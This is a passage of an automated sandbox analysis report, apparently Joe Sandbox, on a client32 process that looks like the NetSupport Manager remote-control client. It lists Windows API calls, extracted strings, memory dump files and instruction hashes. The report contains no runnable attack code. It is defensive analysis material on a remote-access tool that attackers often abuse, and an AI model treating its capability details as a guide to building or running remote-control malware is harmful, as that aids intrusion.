                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentThread$ErrorLast__wcstoi64
                                                                                                                        • String ID: *Log_%d$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
                                                                                                                        • API String ID: 2021241812-3565238984
                                                                                                                        • Opcode ID: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                        • Instruction ID: fb898e99375fe03a3fe41083e55742ce7b0b576ff4a7e429a818e7135f918612
                                                                                                                        • Opcode Fuzzy Hash: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                        • Instruction Fuzzy Hash: 72514935E00117ABDB11CFA5CC86FBEBBA9FF85718F104579F92597280E734A80187A1
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 685A7F9F
                                                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,6859B916,?,00000100,00000006,00000001), ref: 685A7FAC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 685A7FCB
                                                                                                                        • _malloc.LIBCMT ref: 685A7FFB
                                                                                                                        • wsprintfA.USER32 ref: 685A807C
                                                                                                                        • _free.LIBCMT ref: 685A8110
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 685A811C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary$AddressErrorHeapLastLoadProc_free_malloc_memsetwsprintf
                                                                                                                        • String ID: %02X%02X%02X%02X%02X%02X$GetAdaptersInfo$iphlpapi.dll
                                                                                                                        • API String ID: 1404005415-834977148
                                                                                                                        • Opcode ID: 13d306030e1f1ed31f758a05c3fbd420f405adb4712eb071fb593e591294e547
                                                                                                                        • Instruction ID: 12e4af435aa906d974b962e3880e2ca00fa747ed4b6fe55e5d9d71e1752375d4
                                                                                                                        • Opcode Fuzzy Hash: 13d306030e1f1ed31f758a05c3fbd420f405adb4712eb071fb593e591294e547
                                                                                                                        • Instruction Fuzzy Hash: 57511771A042859BDF01CFB89CE4AEE7BF9EF49300F444165ED69EB241E7319905C761
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • SETUSBMASSSTORAGEACCESS, xrefs: 1103D1E3
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D27F
                                                                                                                        • BLOCKPRINTING, xrefs: 1103D23D
                                                                                                                        • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D262
                                                                                                                        • SETOPTICALDRIVEACCESS, xrefs: 1103D214
                                                                                                                        • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D25B
                                                                                                                        • IsA(), xrefs: 1103D284
                                                                                                                        • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D22F
                                                                                                                        • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D206
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                        • API String ID: 4104443479-1830555902
                                                                                                                        • Opcode ID: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
                                                                                                                        • Instruction ID: 0533b61ff5f256c00753904ec1df5a7198c5ed9dcfad6114a4b50a325be8fdd6
                                                                                                                        • Opcode Fuzzy Hash: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
                                                                                                                        • Instruction Fuzzy Hash: BE41B779A1021AAFCB01CF94CC90FEEB7F8EF55319F044569E855A7241EB35E904C7A1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045544
                                                                                                                        • IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110454E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$FreeString
                                                                                                                        • String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
                                                                                                                        • API String ID: 2011556836-2400621309
                                                                                                                        • Opcode ID: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
                                                                                                                        • Instruction ID: 400cf60c0998823ea0bb6020a3248241c8ed3d764918c69dd9f09d3b4840e21c
                                                                                                                        • Opcode Fuzzy Hash: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
                                                                                                                        • Instruction Fuzzy Hash: AE816471E0021A9BDB20DF54CC90BAAB3B5EF88714F1045E8D909D7A84EB75AE81CF90
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,7E4636A2), ref: 11059069
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 110590CE
                                                                                                                        • timeGetTime.WINMM ref: 110590FC
                                                                                                                        • GetTickCount.KERNEL32 ref: 11059136
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110591AA
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 110591C4
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110591E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
                                                                                                                        • String ID: _License$maxslaves
                                                                                                                        • API String ID: 3724810986-253336860
                                                                                                                        • Opcode ID: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
                                                                                                                        • Instruction ID: b9473765ee5a894416c22d4106f00ac8eee3be5f778696d0a0a90b9ce83e720c
                                                                                                                        • Opcode Fuzzy Hash: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
                                                                                                                        • Instruction Fuzzy Hash: 49518E71E006269BCB85CFA5C884A6EFBF9FB49704B10866DE925D7244F730E910CBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • PostMessageA.USER32(0000FFFF,0000C1E7,00000000,00000000), ref: 1104B225
                                                                                                                        • PostMessageA.USER32(00010480,0000048F,00000032,00000000), ref: 1104B256
                                                                                                                        • PostMessageA.USER32(00010480,00000483,00000000,00000000), ref: 1104B268
                                                                                                                        • PostMessageA.USER32(00010480,0000048F,000000C8,00000000), ref: 1104B27C
                                                                                                                        • PostMessageA.USER32(00010480,00000483,00000001,?), ref: 1104B293
                                                                                                                        • PostMessageA.USER32(00010480,00000800,00000000,00000000), ref: 1104B2A4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$__wcstoi64
                                                                                                                        • String ID: Client$UnloadMirrorOnEndView$tVPq
                                                                                                                        • API String ID: 1802880851-2026197083
                                                                                                                        • Opcode ID: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                        • Instruction ID: 72b0dfb70f0a874fb1e004092d90b5695b323917c743566986231bfe2b7fd1fa
                                                                                                                        • Opcode Fuzzy Hash: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                        • Instruction Fuzzy Hash: E6412775B025257BD311DBA4CC85FEBB7AABF89708F1081A9F61497284DB70B900CBD4
                                                                                                                        APIs
                                                                                                                        • _memmove.LIBCMT ref: 685A783E
                                                                                                                        • #16.WSOCK32(?,?,?,00000000), ref: 685A78F6
                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 685A7924
                                                                                                                        • wsprintfA.USER32 ref: 685A7937
                                                                                                                        • OutputDebugStringA.KERNEL32(?), ref: 685A7944
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugErrorLastOutputString_memmovewsprintf
                                                                                                                        • String ID: $(Httputil.c) Error %d reading HTTP response header$hbuf->data$httputil.c
                                                                                                                        • API String ID: 2214935655-769711038
                                                                                                                        • Opcode ID: d3294f3d40910b0a7d1253ea00ffe4116301ffe90f485bc4105bf2adf1f72d1d
                                                                                                                        • Instruction ID: f2154b5dc352582d8d2516ec355aa41ff31728e57bd543d3bf0962d10700200e
                                                                                                                        • Opcode Fuzzy Hash: d3294f3d40910b0a7d1253ea00ffe4116301ffe90f485bc4105bf2adf1f72d1d
                                                                                                                        • Instruction Fuzzy Hash: 39417F79A006019FD720DF68DC90E6FB7F9EF94314B40882DE89A87645E770F805CB90
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(wininet.dll,00002000,00000000,00000000), ref: 68596ABD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 68596ACF
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 68596AFC
                                                                                                                        • wsprintfA.USER32 ref: 68596B52
                                                                                                                        • _free.LIBCMT ref: 68596B96
                                                                                                                        • _free.LIBCMT ref: 68596BA2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library_free$AddressFreeLoadProcwsprintf
                                                                                                                        • String ID: InternetQueryOptionA$http://%s/testpage.htm$wininet.dll
                                                                                                                        • API String ID: 3641295650-227718810
                                                                                                                        • Opcode ID: d28fc30bc7f22f65c4cdcbfac7eb13015de32ca2f695877d712c5fab75621993
                                                                                                                        • Instruction ID: cb99a9dd6800f14f6b2b663a2d966b207bf04046f18c61fd20ebd337a353d78c
                                                                                                                        • Opcode Fuzzy Hash: d28fc30bc7f22f65c4cdcbfac7eb13015de32ca2f695877d712c5fab75621993
                                                                                                                        • Instruction Fuzzy Hash: 02413271D402199BDB65DF68CD81FEEB7F8AB44304F4181E9E91DA7200EB709E849F90
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 68597C8D
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,00000000,a3Zh,?), ref: 68597D18
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,00000000,a3Zh,?), ref: 68597D68
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,00000000,a3Zh,?), ref: 68597D6F
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,00000000,a3Zh,?), ref: 68597D83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$_memset
                                                                                                                        • String ID: &-Zh$RESULT$a3Zh$b
                                                                                                                        • API String ID: 920729587-1441757321
                                                                                                                        • Opcode ID: 220b023eb8127222d7d0c180881d024c62cf0d73a237a42eb98f46d5a5d6e3b4
                                                                                                                        • Instruction ID: ac7a46e2b0fec28522facf660daac6583b21bd0ec8407300fde942649d2bf082
                                                                                                                        • Opcode Fuzzy Hash: 220b023eb8127222d7d0c180881d024c62cf0d73a237a42eb98f46d5a5d6e3b4
                                                                                                                        • Instruction Fuzzy Hash: AF3172B5D00209AFDF10DFA4C841BEEBBF5EB48300F91406AE959E7240EB349A44CBA5
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 1102732F
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 11027336
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 11027358
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027378
                                                                                                                        • LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027399
                                                                                                                        • _free.LIBCMT ref: 110273C4
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 110273D6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleLookupNameOpenPrivilege_free
                                                                                                                        • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
                                                                                                                        • API String ID: 2058255784-3275751932
                                                                                                                        • Opcode ID: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
                                                                                                                        • Instruction ID: ade80763f836c408a2a1d446ea8312ce3e6dd7fa4b179276d35611dba123a850
                                                                                                                        • Opcode Fuzzy Hash: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
                                                                                                                        • Instruction Fuzzy Hash: D42176B5D0021AAFD710DFE4DC85EAFBBBDEF44704F108119EA15A7240D770A906CBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • GetTickCount.KERNEL32 ref: 11057136
                                                                                                                          • Part of subcall function 11157010: LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
                                                                                                                          • Part of subcall function 11157010: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
